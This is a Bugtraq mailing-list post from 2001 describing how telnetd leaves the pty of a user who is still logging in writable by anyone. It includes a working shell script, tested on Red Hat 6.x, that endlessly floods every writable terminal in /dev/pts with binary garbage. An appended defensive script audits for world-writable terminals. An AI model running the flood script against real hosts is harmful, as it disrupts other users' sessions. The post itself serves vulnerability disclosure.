[18411] in bugtraq
Re: Securax Advisory 13
daemon@ATHENA.MIT.EDU (teleh0r)
Wed Jan  3 12:07:32 2001
Message-Id:  <01010306354802.02032@localhost.localdomain>
Date:         Wed, 3 Jan 2001 06:35:48 +0100
Reply-To: teleh0r <teleh0r@DOGLOVER.COM>
From: teleh0r <teleh0r@DOGLOVER.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
A long time ago I wrote a shell script which would flood the terminal
of a user trying to log in - it was placed on my website, and someone
called "c0sa_n0stra" mailed me and asked me to explain how it worked,
and then he was kind enough to send it to packetstorm, adding his
handle in the process (and an ASCII cow).
(http://packetstorm.securify.com/DoS/m000h.sh)
The problem is the way that the telnet daemon assigns a new user
a terminal - while a user is telling the telnetd who he is and
what his password is, his terminal will be waiting in /dev/pts/
and writable by anyone. As soon as he has logged in, it will not be.
It is still possible for him to log in, though, even if a binary is
cat'ed to the terminal
(but, as said by Fyodor, it may mess up his terminal).
sshd/rshd/rlogind do not behave this way - there will be no writable
terminal in /dev/pts/ while the authentication is taking place.
The script below has been tested on Redhat 6.1 and 6.2.
----
#!/bin/sh
# Floods every world-writable terminal in /dev/pts except our own.
TTYDIR=/dev/pts
NONSENSE=/bin/nice      # any binary will do as garbage to write
MYTTY=$(tty)            # To prevent flooding of one's own TTY
while :; do
    for i in "$TTYDIR"/* ; do
        # Variables are quoted so that tty printing "not a tty"
        # (script run without a terminal) cannot break the test.
        if [ -w "$i" ] && [ -c "$i" ] && [ "$i" != "$MYTTY" ]; then
            cat "$NONSENSE" > "$i"
        fi
    done
done
----
Sincerely yours,
teleh0r
--
To avoid criticism, do nothing, say nothing, be nothing.
                -- Elbert Hubbard
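The post above describes a pre-login pty that is writable by anyone, which is exactly what an administrator would want to check for on their own telnetd host. The following is an added example, not code from the original post or from teleh0r: it audits a terminal directory for entries whose "other" write bit is set, reporting mode, owner and path. It reads the mode bits from ls -ld instead of using the -w test, because -w only reports whether the caller could write (always true for root) and says nothing about other users. The directory default of /dev/pts, the 0622/0620 fixture modes and the function names are assumptions of this example; the fixture uses regular files so the check can be exercised without root, and 0620 is used as the "not world-writable" case implied by the post's sshd/rlogind comparison.

```sh
#!/bin/sh
# Added example (not from the original post): list world-writable entries
# in a terminal directory, the state described for a pending telnet login.
# Usage: world_writable_ttys [DIR]   (DIR defaults to /dev/pts, an assumption)

world_writable_ttys() {
    dir=${1:-/dev/pts}
    for f in "$dir"/*; do
        [ -e "$f" ] || continue
        # First 10 characters of ls -ld are the type and permission string,
        # e.g. "crw--w--w-"; character 9 is the "other" write bit.
        line=$(ls -ld "$f")
        perms=$(printf '%s\n' "$line" | cut -c1-10)
        case $perms in
            ????????w?)
                owner=$(printf '%s\n' "$line" | awk '{print $3}')
                printf '%s %s %s\n' "$perms" "$owner" "$f"
                ;;
        esac
    done
}

# Number of world-writable entries found under DIR (0 if none or DIR missing).
count_world_writable() {
    world_writable_ttys "$1" | wc -l | tr -d ' '
}

# Constructed fixture: two fake terminals in a scratch directory.
# "pending" is world-writable like the pre-login pty in the post;
# "safe" has mode 0620 (owner rw, group w), i.e. not writable by others.
# Prints the number of world-writable entries the audit reports (expect 1).
audit_demo() {
    scratch=$(mktemp -d) || return 1
    : > "$scratch/pending"; chmod 0622 "$scratch/pending"
    : > "$scratch/safe";    chmod 0620 "$scratch/safe"
    count_world_writable "$scratch"
    rm -rf "$scratch"
}

audit_demo
```

Run world_writable_ttys with no argument on a real host while a telnet login is pending and compare with the output once the user has logged in; an entry that appears only during authentication is the window the post describes.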